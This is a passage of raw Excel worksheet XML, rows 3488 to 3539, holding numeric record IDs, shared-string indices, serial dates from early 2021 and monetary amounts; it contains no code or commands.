        <v>12767</v>
      </c>
    </row>
    <row r="3488" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3488">
        <v>23642</v>
      </c>
      <c r="B3488">
        <v>1195</v>
      </c>
      <c r="C3488" t="s">
        <v>4015</v>
      </c>
      <c r="D3488" t="s">
        <v>12766</v>
      </c>
      <c r="E3488">
        <v>16</v>
      </c>
      <c r="F3488" t="s">
        <v>12769</v>
      </c>
      <c r="G3488" s="1">
        <v>44223</v>
      </c>
      <c r="H3488">
        <v>50000</v>
      </c>
      <c r="J3488" t="s">
        <v>12767</v>
      </c>
    </row>
    <row r="3489" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3489">
        <v>23643</v>
      </c>
      <c r="B3489">
        <v>1195</v>
      </c>
      <c r="C3489" t="s">
        <v>4015</v>
      </c>
      <c r="D3489" t="s">
        <v>12766</v>
      </c>
      <c r="E3489">
        <v>16</v>
      </c>
      <c r="F3489" t="s">
        <v>12465</v>
      </c>
      <c r="G3489" s="1">
        <v>44223</v>
      </c>
      <c r="H3489">
        <v>20000</v>
      </c>
      <c r="J3489" t="s">
        <v>12770</v>
      </c>
    </row>
    <row r="3490" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3490">
        <v>23644</v>
      </c>
      <c r="B3490">
        <v>1195</v>
      </c>
      <c r="C3490" t="s">
        <v>4015</v>
      </c>
      <c r="D3490" t="s">
        <v>12766</v>
      </c>
      <c r="E3490">
        <v>16</v>
      </c>
      <c r="F3490" t="s">
        <v>9681</v>
      </c>
      <c r="G3490" s="1">
        <v>44223</v>
      </c>
      <c r="H3490">
        <v>5000</v>
      </c>
    </row>
    <row r="3491" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3491">
        <v>23645</v>
      </c>
      <c r="B3491">
        <v>1195</v>
      </c>
      <c r="C3491" t="s">
        <v>4015</v>
      </c>
      <c r="D3491" t="s">
        <v>12766</v>
      </c>
      <c r="E3491">
        <v>16</v>
      </c>
      <c r="F3491" t="s">
        <v>9941</v>
      </c>
      <c r="G3491" s="1">
        <v>44223</v>
      </c>
      <c r="H3491">
        <v>5000</v>
      </c>
      <c r="J3491" t="s">
        <v>12767</v>
      </c>
    </row>
    <row r="3492" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3492">
        <v>23646</v>
      </c>
      <c r="B3492">
        <v>1195</v>
      </c>
      <c r="C3492" t="s">
        <v>4015</v>
      </c>
      <c r="D3492" t="s">
        <v>12766</v>
      </c>
      <c r="E3492">
        <v>16</v>
      </c>
      <c r="F3492" t="s">
        <v>12771</v>
      </c>
      <c r="G3492" s="1">
        <v>44223</v>
      </c>
      <c r="H3492">
        <v>50000</v>
      </c>
      <c r="J3492" t="s">
        <v>12772</v>
      </c>
    </row>
    <row r="3493" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3493">
        <v>23647</v>
      </c>
      <c r="B3493">
        <v>549</v>
      </c>
      <c r="C3493" t="s">
        <v>2128</v>
      </c>
      <c r="D3493" t="s">
        <v>12773</v>
      </c>
      <c r="E3493">
        <v>16</v>
      </c>
      <c r="F3493" t="s">
        <v>12774</v>
      </c>
      <c r="G3493" s="1">
        <v>44253</v>
      </c>
      <c r="H3493">
        <v>500</v>
      </c>
      <c r="I3493" t="s">
        <v>9536</v>
      </c>
    </row>
    <row r="3494" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3494">
        <v>23649</v>
      </c>
      <c r="B3494">
        <v>549</v>
      </c>
      <c r="C3494" t="s">
        <v>2128</v>
      </c>
      <c r="D3494" t="s">
        <v>12773</v>
      </c>
      <c r="E3494">
        <v>16</v>
      </c>
      <c r="F3494" t="s">
        <v>9441</v>
      </c>
      <c r="G3494" s="1">
        <v>44253</v>
      </c>
      <c r="H3494">
        <v>0</v>
      </c>
      <c r="J3494" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="3495" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3495">
        <v>23650</v>
      </c>
      <c r="B3495">
        <v>549</v>
      </c>
      <c r="C3495" t="s">
        <v>2128</v>
      </c>
      <c r="D3495" t="s">
        <v>12773</v>
      </c>
      <c r="E3495">
        <v>16</v>
      </c>
      <c r="F3495" t="s">
        <v>12775</v>
      </c>
      <c r="G3495" s="1">
        <v>44253</v>
      </c>
      <c r="H3495">
        <v>0</v>
      </c>
      <c r="J3495" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="3496" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3496">
        <v>23651</v>
      </c>
      <c r="B3496">
        <v>549</v>
      </c>
      <c r="C3496" t="s">
        <v>2128</v>
      </c>
      <c r="D3496" t="s">
        <v>12773</v>
      </c>
      <c r="E3496">
        <v>16</v>
      </c>
      <c r="F3496" t="s">
        <v>12776</v>
      </c>
      <c r="G3496" s="1">
        <v>44253</v>
      </c>
      <c r="H3496">
        <v>0</v>
      </c>
      <c r="J3496" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="3497" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3497">
        <v>23652</v>
      </c>
      <c r="B3497">
        <v>1443</v>
      </c>
      <c r="C3497" t="s">
        <v>4035</v>
      </c>
      <c r="D3497" t="s">
        <v>12777</v>
      </c>
      <c r="E3497">
        <v>16</v>
      </c>
      <c r="F3497" t="s">
        <v>4037</v>
      </c>
      <c r="G3497" s="1">
        <v>44298</v>
      </c>
      <c r="H3497">
        <v>120000</v>
      </c>
      <c r="J3497" t="s">
        <v>12778</v>
      </c>
    </row>
    <row r="3498" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3498">
        <v>23659</v>
      </c>
      <c r="B3498">
        <v>446</v>
      </c>
      <c r="C3498" t="s">
        <v>2192</v>
      </c>
      <c r="D3498" t="s">
        <v>12779</v>
      </c>
      <c r="E3498">
        <v>23</v>
      </c>
      <c r="F3498" t="s">
        <v>673</v>
      </c>
      <c r="G3498" s="1">
        <v>44217</v>
      </c>
      <c r="H3498">
        <v>1600000</v>
      </c>
      <c r="I3498" t="s">
        <v>9536</v>
      </c>
      <c r="J3498" t="s">
        <v>12780</v>
      </c>
    </row>
    <row r="3499" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3499">
        <v>23660</v>
      </c>
      <c r="B3499">
        <v>446</v>
      </c>
      <c r="C3499" t="s">
        <v>2192</v>
      </c>
      <c r="D3499" t="s">
        <v>12779</v>
      </c>
      <c r="E3499">
        <v>23</v>
      </c>
      <c r="F3499" t="s">
        <v>9441</v>
      </c>
      <c r="G3499" s="1">
        <v>44217</v>
      </c>
      <c r="H3499">
        <v>100000</v>
      </c>
      <c r="J3499" t="s">
        <v>11948</v>
      </c>
    </row>
    <row r="3500" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3500">
        <v>23666</v>
      </c>
      <c r="B3500">
        <v>5222</v>
      </c>
      <c r="C3500" t="s">
        <v>8304</v>
      </c>
      <c r="D3500" t="s">
        <v>12781</v>
      </c>
      <c r="E3500">
        <v>4</v>
      </c>
      <c r="F3500" t="s">
        <v>3814</v>
      </c>
      <c r="G3500" s="1">
        <v>44207</v>
      </c>
      <c r="H3500">
        <v>120000</v>
      </c>
      <c r="J3500" t="s">
        <v>10382</v>
      </c>
    </row>
    <row r="3501" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3501">
        <v>23667</v>
      </c>
      <c r="B3501">
        <v>5222</v>
      </c>
      <c r="C3501" t="s">
        <v>8304</v>
      </c>
      <c r="D3501" t="s">
        <v>12781</v>
      </c>
      <c r="E3501">
        <v>4</v>
      </c>
      <c r="F3501" t="s">
        <v>12782</v>
      </c>
      <c r="G3501" s="1">
        <v>44207</v>
      </c>
      <c r="H3501">
        <v>100000</v>
      </c>
      <c r="J3501" t="s">
        <v>10382</v>
      </c>
    </row>
    <row r="3502" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3502">
        <v>23668</v>
      </c>
      <c r="B3502">
        <v>5222</v>
      </c>
      <c r="C3502" t="s">
        <v>8304</v>
      </c>
      <c r="D3502" t="s">
        <v>12781</v>
      </c>
      <c r="E3502">
        <v>4</v>
      </c>
      <c r="F3502" t="s">
        <v>12504</v>
      </c>
      <c r="G3502" s="1">
        <v>44207</v>
      </c>
      <c r="H3502">
        <v>100000</v>
      </c>
      <c r="J3502" t="s">
        <v>10382</v>
      </c>
    </row>
    <row r="3503" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3503">
        <v>23671</v>
      </c>
      <c r="B3503">
        <v>1434</v>
      </c>
      <c r="C3503" t="s">
        <v>3932</v>
      </c>
      <c r="D3503" t="s">
        <v>12783</v>
      </c>
      <c r="E3503">
        <v>11</v>
      </c>
      <c r="F3503" t="s">
        <v>9460</v>
      </c>
      <c r="G3503" s="1">
        <v>44281</v>
      </c>
      <c r="H3503">
        <v>1000</v>
      </c>
      <c r="I3503" t="s">
        <v>12784</v>
      </c>
      <c r="J3503" t="s">
        <v>9949</v>
      </c>
    </row>
    <row r="3504" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3504">
        <v>23672</v>
      </c>
      <c r="B3504">
        <v>1434</v>
      </c>
      <c r="C3504" t="s">
        <v>3932</v>
      </c>
      <c r="D3504" t="s">
        <v>12783</v>
      </c>
      <c r="E3504">
        <v>11</v>
      </c>
      <c r="F3504" t="s">
        <v>9438</v>
      </c>
      <c r="G3504" s="1">
        <v>44281</v>
      </c>
      <c r="H3504">
        <v>40000</v>
      </c>
      <c r="I3504" t="s">
        <v>12785</v>
      </c>
      <c r="J3504" t="s">
        <v>9949</v>
      </c>
    </row>
    <row r="3505" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3505">
        <v>23673</v>
      </c>
      <c r="B3505">
        <v>1434</v>
      </c>
      <c r="C3505" t="s">
        <v>3932</v>
      </c>
      <c r="D3505" t="s">
        <v>12783</v>
      </c>
      <c r="E3505">
        <v>11</v>
      </c>
      <c r="F3505" t="s">
        <v>12786</v>
      </c>
      <c r="G3505" s="1">
        <v>44281</v>
      </c>
      <c r="H3505">
        <v>50000</v>
      </c>
      <c r="I3505" t="s">
        <v>12787</v>
      </c>
      <c r="J3505" t="s">
        <v>9949</v>
      </c>
    </row>
    <row r="3506" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3506">
        <v>23674</v>
      </c>
      <c r="B3506">
        <v>1434</v>
      </c>
      <c r="C3506" t="s">
        <v>3932</v>
      </c>
      <c r="D3506" t="s">
        <v>12783</v>
      </c>
      <c r="E3506">
        <v>11</v>
      </c>
      <c r="F3506" t="s">
        <v>12788</v>
      </c>
      <c r="G3506" s="1">
        <v>44281</v>
      </c>
      <c r="H3506">
        <v>50000</v>
      </c>
      <c r="I3506" t="s">
        <v>12787</v>
      </c>
      <c r="J3506" t="s">
        <v>9949</v>
      </c>
    </row>
    <row r="3507" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3507">
        <v>23675</v>
      </c>
      <c r="B3507">
        <v>1434</v>
      </c>
      <c r="C3507" t="s">
        <v>3932</v>
      </c>
      <c r="D3507" t="s">
        <v>12783</v>
      </c>
      <c r="E3507">
        <v>11</v>
      </c>
      <c r="F3507" t="s">
        <v>9722</v>
      </c>
      <c r="G3507" s="1">
        <v>44281</v>
      </c>
      <c r="H3507">
        <v>20000</v>
      </c>
      <c r="I3507" t="s">
        <v>12789</v>
      </c>
      <c r="J3507" t="s">
        <v>9949</v>
      </c>
    </row>
    <row r="3508" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3508">
        <v>23676</v>
      </c>
      <c r="B3508">
        <v>1434</v>
      </c>
      <c r="C3508" t="s">
        <v>3932</v>
      </c>
      <c r="D3508" t="s">
        <v>12783</v>
      </c>
      <c r="E3508">
        <v>11</v>
      </c>
      <c r="F3508" t="s">
        <v>9435</v>
      </c>
      <c r="G3508" s="1">
        <v>44281</v>
      </c>
      <c r="H3508">
        <v>20000</v>
      </c>
      <c r="I3508" t="s">
        <v>12790</v>
      </c>
      <c r="J3508" t="s">
        <v>9949</v>
      </c>
    </row>
    <row r="3509" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3509">
        <v>23677</v>
      </c>
      <c r="B3509">
        <v>1434</v>
      </c>
      <c r="C3509" t="s">
        <v>3932</v>
      </c>
      <c r="D3509" t="s">
        <v>12783</v>
      </c>
      <c r="E3509">
        <v>11</v>
      </c>
      <c r="F3509" t="s">
        <v>9527</v>
      </c>
      <c r="G3509" s="1">
        <v>44281</v>
      </c>
      <c r="H3509">
        <v>5000</v>
      </c>
      <c r="I3509" t="s">
        <v>12791</v>
      </c>
      <c r="J3509" t="s">
        <v>9949</v>
      </c>
    </row>
    <row r="3510" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3510">
        <v>23678</v>
      </c>
      <c r="B3510">
        <v>1434</v>
      </c>
      <c r="C3510" t="s">
        <v>3932</v>
      </c>
      <c r="D3510" t="s">
        <v>12783</v>
      </c>
      <c r="E3510">
        <v>11</v>
      </c>
      <c r="F3510" t="s">
        <v>9577</v>
      </c>
      <c r="G3510" s="1">
        <v>44281</v>
      </c>
      <c r="H3510">
        <v>1000</v>
      </c>
      <c r="I3510" t="s">
        <v>12791</v>
      </c>
      <c r="J3510" t="s">
        <v>9949</v>
      </c>
    </row>
    <row r="3511" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3511">
        <v>23679</v>
      </c>
      <c r="B3511">
        <v>1434</v>
      </c>
      <c r="C3511" t="s">
        <v>3932</v>
      </c>
      <c r="D3511" t="s">
        <v>12783</v>
      </c>
      <c r="E3511">
        <v>11</v>
      </c>
      <c r="F3511" t="s">
        <v>12792</v>
      </c>
      <c r="G3511" s="1">
        <v>44281</v>
      </c>
      <c r="H3511">
        <v>20000</v>
      </c>
      <c r="I3511" t="s">
        <v>12791</v>
      </c>
      <c r="J3511" t="s">
        <v>9949</v>
      </c>
    </row>
    <row r="3512" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3512">
        <v>23680</v>
      </c>
      <c r="B3512">
        <v>1434</v>
      </c>
      <c r="C3512" t="s">
        <v>3932</v>
      </c>
      <c r="D3512" t="s">
        <v>12783</v>
      </c>
      <c r="E3512">
        <v>11</v>
      </c>
      <c r="F3512" t="s">
        <v>12793</v>
      </c>
      <c r="G3512" s="1">
        <v>44281</v>
      </c>
      <c r="H3512">
        <v>20000</v>
      </c>
      <c r="I3512" t="s">
        <v>12791</v>
      </c>
      <c r="J3512" t="s">
        <v>9949</v>
      </c>
    </row>
    <row r="3513" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3513">
        <v>23682</v>
      </c>
      <c r="B3513">
        <v>4827</v>
      </c>
      <c r="C3513" t="s">
        <v>7803</v>
      </c>
      <c r="D3513" t="s">
        <v>12794</v>
      </c>
      <c r="E3513">
        <v>15</v>
      </c>
      <c r="F3513" t="s">
        <v>12795</v>
      </c>
      <c r="G3513" s="1">
        <v>44218</v>
      </c>
      <c r="H3513">
        <v>600</v>
      </c>
      <c r="I3513" t="s">
        <v>12796</v>
      </c>
    </row>
    <row r="3514" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3514">
        <v>23684</v>
      </c>
      <c r="B3514">
        <v>519</v>
      </c>
      <c r="C3514" t="s">
        <v>1813</v>
      </c>
      <c r="D3514" t="s">
        <v>12797</v>
      </c>
      <c r="E3514">
        <v>16</v>
      </c>
      <c r="F3514" t="s">
        <v>9437</v>
      </c>
      <c r="G3514" s="1">
        <v>44236</v>
      </c>
      <c r="H3514">
        <v>100000</v>
      </c>
      <c r="I3514" t="s">
        <v>12798</v>
      </c>
    </row>
    <row r="3515" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3515">
        <v>23685</v>
      </c>
      <c r="B3515">
        <v>2719</v>
      </c>
      <c r="C3515" t="s">
        <v>6860</v>
      </c>
      <c r="D3515" t="s">
        <v>10823</v>
      </c>
      <c r="E3515">
        <v>13</v>
      </c>
      <c r="F3515" t="s">
        <v>12799</v>
      </c>
      <c r="G3515" s="1">
        <v>44221</v>
      </c>
      <c r="H3515">
        <v>0</v>
      </c>
      <c r="J3515" t="s">
        <v>12800</v>
      </c>
    </row>
    <row r="3516" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3516">
        <v>23686</v>
      </c>
      <c r="B3516">
        <v>5007</v>
      </c>
      <c r="C3516" t="s">
        <v>7838</v>
      </c>
      <c r="D3516" t="s">
        <v>12801</v>
      </c>
      <c r="E3516">
        <v>14</v>
      </c>
      <c r="F3516" t="s">
        <v>3076</v>
      </c>
      <c r="G3516" s="1">
        <v>44316</v>
      </c>
      <c r="H3516">
        <v>600000</v>
      </c>
      <c r="I3516" t="s">
        <v>12802</v>
      </c>
    </row>
    <row r="3517" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3517">
        <v>23687</v>
      </c>
      <c r="B3517">
        <v>537</v>
      </c>
      <c r="C3517" t="s">
        <v>2216</v>
      </c>
      <c r="D3517" t="s">
        <v>12803</v>
      </c>
      <c r="E3517">
        <v>2</v>
      </c>
      <c r="F3517" t="s">
        <v>9437</v>
      </c>
      <c r="G3517" s="1">
        <v>44252</v>
      </c>
      <c r="H3517">
        <v>1579400</v>
      </c>
      <c r="J3517" t="s">
        <v>10793</v>
      </c>
    </row>
    <row r="3518" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3518">
        <v>23688</v>
      </c>
      <c r="B3518">
        <v>537</v>
      </c>
      <c r="C3518" t="s">
        <v>2216</v>
      </c>
      <c r="D3518" t="s">
        <v>12803</v>
      </c>
      <c r="E3518">
        <v>2</v>
      </c>
      <c r="F3518" t="s">
        <v>12804</v>
      </c>
      <c r="G3518" s="1">
        <v>44252</v>
      </c>
      <c r="H3518">
        <v>6456479</v>
      </c>
      <c r="J3518" t="s">
        <v>10793</v>
      </c>
    </row>
    <row r="3519" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3519">
        <v>23689</v>
      </c>
      <c r="B3519">
        <v>537</v>
      </c>
      <c r="C3519" t="s">
        <v>2216</v>
      </c>
      <c r="D3519" t="s">
        <v>12803</v>
      </c>
      <c r="E3519">
        <v>2</v>
      </c>
      <c r="F3519" t="s">
        <v>12805</v>
      </c>
      <c r="G3519" s="1">
        <v>44252</v>
      </c>
      <c r="H3519">
        <v>534000</v>
      </c>
      <c r="J3519" t="s">
        <v>10793</v>
      </c>
    </row>
    <row r="3520" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3520">
        <v>23690</v>
      </c>
      <c r="B3520">
        <v>537</v>
      </c>
      <c r="C3520" t="s">
        <v>2216</v>
      </c>
      <c r="D3520" t="s">
        <v>12803</v>
      </c>
      <c r="E3520">
        <v>2</v>
      </c>
      <c r="F3520" t="s">
        <v>1746</v>
      </c>
      <c r="G3520" s="1">
        <v>44252</v>
      </c>
      <c r="H3520">
        <v>1200</v>
      </c>
      <c r="J3520" t="s">
        <v>10793</v>
      </c>
    </row>
    <row r="3521" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3521">
        <v>23691</v>
      </c>
      <c r="B3521">
        <v>1302</v>
      </c>
      <c r="C3521" t="s">
        <v>3985</v>
      </c>
      <c r="D3521" t="s">
        <v>12806</v>
      </c>
      <c r="E3521">
        <v>10</v>
      </c>
      <c r="F3521" t="s">
        <v>12807</v>
      </c>
      <c r="G3521" s="1">
        <v>44207</v>
      </c>
      <c r="H3521">
        <v>1300</v>
      </c>
      <c r="I3521" t="s">
        <v>12808</v>
      </c>
    </row>
    <row r="3522" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3522">
        <v>23692</v>
      </c>
      <c r="B3522">
        <v>1302</v>
      </c>
      <c r="C3522" t="s">
        <v>3985</v>
      </c>
      <c r="D3522" t="s">
        <v>12806</v>
      </c>
      <c r="E3522">
        <v>10</v>
      </c>
      <c r="F3522" t="s">
        <v>11508</v>
      </c>
      <c r="G3522" s="1">
        <v>44207</v>
      </c>
      <c r="H3522">
        <v>600</v>
      </c>
      <c r="I3522" t="s">
        <v>12808</v>
      </c>
    </row>
    <row r="3523" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3523">
        <v>23693</v>
      </c>
      <c r="B3523">
        <v>1302</v>
      </c>
      <c r="C3523" t="s">
        <v>3985</v>
      </c>
      <c r="D3523" t="s">
        <v>12806</v>
      </c>
      <c r="E3523">
        <v>10</v>
      </c>
      <c r="F3523" t="s">
        <v>11652</v>
      </c>
      <c r="G3523" s="1">
        <v>44207</v>
      </c>
      <c r="H3523">
        <v>600</v>
      </c>
      <c r="I3523" t="s">
        <v>12808</v>
      </c>
    </row>
    <row r="3524" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3524">
        <v>23694</v>
      </c>
      <c r="B3524">
        <v>1302</v>
      </c>
      <c r="C3524" t="s">
        <v>3985</v>
      </c>
      <c r="D3524" t="s">
        <v>12806</v>
      </c>
      <c r="E3524">
        <v>10</v>
      </c>
      <c r="F3524" t="s">
        <v>12809</v>
      </c>
      <c r="G3524" s="1">
        <v>44207</v>
      </c>
      <c r="H3524">
        <v>800</v>
      </c>
      <c r="I3524" t="s">
        <v>12808</v>
      </c>
    </row>
    <row r="3525" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3525">
        <v>23695</v>
      </c>
      <c r="B3525">
        <v>21</v>
      </c>
      <c r="C3525" t="s">
        <v>16492</v>
      </c>
      <c r="D3525" t="s">
        <v>16493</v>
      </c>
      <c r="E3525">
        <v>22</v>
      </c>
      <c r="F3525" t="s">
        <v>1746</v>
      </c>
      <c r="G3525" s="1">
        <v>44264</v>
      </c>
      <c r="H3525" s="4">
        <v>350000</v>
      </c>
      <c r="I3525" t="s">
        <v>11160</v>
      </c>
      <c r="J3525" t="s">
        <v>12810</v>
      </c>
    </row>
    <row r="3526" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3526">
        <v>23697</v>
      </c>
      <c r="B3526">
        <v>5221</v>
      </c>
      <c r="C3526" t="s">
        <v>8288</v>
      </c>
      <c r="D3526" t="s">
        <v>12811</v>
      </c>
      <c r="E3526">
        <v>26</v>
      </c>
      <c r="F3526" t="s">
        <v>364</v>
      </c>
      <c r="G3526" s="1">
        <v>44251</v>
      </c>
      <c r="H3526">
        <v>700</v>
      </c>
      <c r="J3526" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="3527" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3527">
        <v>23698</v>
      </c>
      <c r="B3527">
        <v>1468</v>
      </c>
      <c r="C3527" t="s">
        <v>2488</v>
      </c>
      <c r="D3527" t="s">
        <v>9773</v>
      </c>
      <c r="E3527">
        <v>13</v>
      </c>
      <c r="F3527" t="s">
        <v>9437</v>
      </c>
      <c r="G3527" s="1">
        <v>44253</v>
      </c>
      <c r="H3527">
        <v>72990</v>
      </c>
      <c r="I3527" t="s">
        <v>12812</v>
      </c>
    </row>
    <row r="3528" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3528">
        <v>23699</v>
      </c>
      <c r="B3528">
        <v>1468</v>
      </c>
      <c r="C3528" t="s">
        <v>2488</v>
      </c>
      <c r="D3528" t="s">
        <v>9773</v>
      </c>
      <c r="E3528">
        <v>13</v>
      </c>
      <c r="F3528" t="s">
        <v>12013</v>
      </c>
      <c r="G3528" s="1">
        <v>44253</v>
      </c>
      <c r="H3528">
        <v>394000</v>
      </c>
      <c r="I3528" t="s">
        <v>12813</v>
      </c>
    </row>
    <row r="3529" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3529">
        <v>23700</v>
      </c>
      <c r="B3529">
        <v>1468</v>
      </c>
      <c r="C3529" t="s">
        <v>16500</v>
      </c>
      <c r="D3529" t="s">
        <v>16501</v>
      </c>
      <c r="E3529">
        <v>13</v>
      </c>
      <c r="F3529" t="s">
        <v>9438</v>
      </c>
      <c r="G3529" s="1">
        <v>44253</v>
      </c>
      <c r="H3529">
        <v>285790.34000000003</v>
      </c>
      <c r="I3529" t="s">
        <v>12814</v>
      </c>
    </row>
    <row r="3530" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3530">
        <v>23703</v>
      </c>
      <c r="B3530">
        <v>242</v>
      </c>
      <c r="C3530" t="s">
        <v>1130</v>
      </c>
      <c r="D3530" t="s">
        <v>11697</v>
      </c>
      <c r="E3530">
        <v>16</v>
      </c>
      <c r="F3530" t="s">
        <v>12815</v>
      </c>
      <c r="G3530" s="1">
        <v>44231</v>
      </c>
      <c r="H3530">
        <v>90000</v>
      </c>
      <c r="I3530" t="s">
        <v>12816</v>
      </c>
      <c r="J3530" t="s">
        <v>12817</v>
      </c>
    </row>
    <row r="3531" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3531">
        <v>23704</v>
      </c>
      <c r="B3531">
        <v>242</v>
      </c>
      <c r="C3531" t="s">
        <v>1130</v>
      </c>
      <c r="D3531" t="s">
        <v>11697</v>
      </c>
      <c r="E3531">
        <v>16</v>
      </c>
      <c r="F3531" t="s">
        <v>12818</v>
      </c>
      <c r="G3531" s="1">
        <v>44231</v>
      </c>
      <c r="H3531">
        <v>6000</v>
      </c>
      <c r="J3531" t="s">
        <v>10404</v>
      </c>
    </row>
    <row r="3532" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3532">
        <v>23705</v>
      </c>
      <c r="B3532">
        <v>242</v>
      </c>
      <c r="C3532" t="s">
        <v>1130</v>
      </c>
      <c r="D3532" t="s">
        <v>11697</v>
      </c>
      <c r="E3532">
        <v>16</v>
      </c>
      <c r="F3532" t="s">
        <v>12819</v>
      </c>
      <c r="G3532" s="1">
        <v>44231</v>
      </c>
      <c r="H3532">
        <v>2000</v>
      </c>
      <c r="J3532" t="s">
        <v>10404</v>
      </c>
    </row>
    <row r="3533" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3533">
        <v>23706</v>
      </c>
      <c r="B3533">
        <v>2056</v>
      </c>
      <c r="C3533" t="s">
        <v>4860</v>
      </c>
      <c r="D3533" t="s">
        <v>9635</v>
      </c>
      <c r="E3533">
        <v>16</v>
      </c>
      <c r="F3533" t="s">
        <v>3499</v>
      </c>
      <c r="G3533" s="1">
        <v>44232</v>
      </c>
      <c r="H3533">
        <v>5000</v>
      </c>
      <c r="I3533" t="s">
        <v>12820</v>
      </c>
      <c r="J3533" t="s">
        <v>12821</v>
      </c>
    </row>
    <row r="3534" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3534">
        <v>23707</v>
      </c>
      <c r="B3534">
        <v>2056</v>
      </c>
      <c r="C3534" t="s">
        <v>4860</v>
      </c>
      <c r="D3534" t="s">
        <v>9635</v>
      </c>
      <c r="E3534">
        <v>16</v>
      </c>
      <c r="F3534" t="s">
        <v>11554</v>
      </c>
      <c r="G3534" s="1">
        <v>44232</v>
      </c>
      <c r="H3534">
        <v>3000</v>
      </c>
      <c r="I3534" t="s">
        <v>12820</v>
      </c>
      <c r="J3534" t="s">
        <v>12822</v>
      </c>
    </row>
    <row r="3535" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3535">
        <v>23708</v>
      </c>
      <c r="B3535">
        <v>2056</v>
      </c>
      <c r="C3535" t="s">
        <v>4860</v>
      </c>
      <c r="D3535" t="s">
        <v>9635</v>
      </c>
      <c r="E3535">
        <v>16</v>
      </c>
      <c r="F3535" t="s">
        <v>10667</v>
      </c>
      <c r="G3535" s="1">
        <v>44232</v>
      </c>
      <c r="H3535">
        <v>3000</v>
      </c>
      <c r="I3535" t="s">
        <v>12823</v>
      </c>
      <c r="J3535" t="s">
        <v>12822</v>
      </c>
    </row>
    <row r="3536" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3536">
        <v>23709</v>
      </c>
      <c r="B3536">
        <v>5102</v>
      </c>
      <c r="C3536" t="s">
        <v>8264</v>
      </c>
      <c r="D3536" t="s">
        <v>12824</v>
      </c>
      <c r="E3536">
        <v>11</v>
      </c>
      <c r="F3536" t="s">
        <v>8913</v>
      </c>
      <c r="G3536" s="1">
        <v>44287</v>
      </c>
      <c r="H3536">
        <v>300000</v>
      </c>
      <c r="I3536" t="s">
        <v>12825</v>
      </c>
    </row>
    <row r="3537" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3537">
        <v>23710</v>
      </c>
      <c r="B3537">
        <v>5102</v>
      </c>
      <c r="C3537" t="s">
        <v>8264</v>
      </c>
      <c r="D3537" t="s">
        <v>12824</v>
      </c>
      <c r="E3537">
        <v>11</v>
      </c>
      <c r="F3537" t="s">
        <v>12826</v>
      </c>
      <c r="G3537" s="1">
        <v>44287</v>
      </c>
      <c r="H3537">
        <v>300000</v>
      </c>
      <c r="I3537" t="s">
        <v>12827</v>
      </c>
    </row>
    <row r="3538" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3538">
        <v>23711</v>
      </c>
      <c r="B3538">
        <v>5102</v>
      </c>
      <c r="C3538" t="s">
        <v>8264</v>
      </c>
      <c r="D3538" t="s">
        <v>12824</v>
      </c>
      <c r="E3538">
        <v>11</v>
      </c>
      <c r="F3538" t="s">
        <v>9437</v>
      </c>
      <c r="G3538" s="1">
        <v>44287</v>
      </c>
      <c r="H3538">
        <v>300000</v>
      </c>
      <c r="I3538" t="s">
        <v>12828</v>
      </c>
    </row>
    <row r="3539" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3539">
        <v>23712</v>
      </c>
      <c r="B3539">
        <v>1641</v>
      </c>
      <c r="C3539" t="s">
        <v>4077</v>
      </c>
      <c r="D3539" t="s">
        <v>12829</v>
      </c>
      <c r="E3539">
        <v>11</v>
      </c>
      <c r="F3539" t="s">
        <v>12830</v>
      </c>
      <c r="G3539" s="1">
        <v>44258</v>
      </c>
      <c r="H3539">
        <v>800</v>
      </c>
      <c r="I3539" t="s">
        <v>9550</v>
      </c>
